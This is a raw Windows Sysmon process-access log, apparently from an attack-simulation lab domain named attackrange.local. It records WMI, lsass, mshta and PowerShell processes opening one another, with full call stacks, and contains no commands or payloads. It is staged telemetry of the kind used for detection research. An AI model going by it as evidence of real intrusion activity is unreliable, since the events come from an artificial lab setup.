16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.661{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.645{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.645{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.645{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.629{7901BC46-4987-6008-1600-00000000A301}15364028C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.629{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.614{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.614{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-55CB-6008-F006-00000000A301}1092C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.614{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.614{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:47.614{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030740Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030739Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030738Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030737Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030736Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030735Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-55CC-6008-F506-00000000A301}6084C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030734Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55CC-6008-F506-00000000A301}6084C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030733Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:48.739{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030732Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 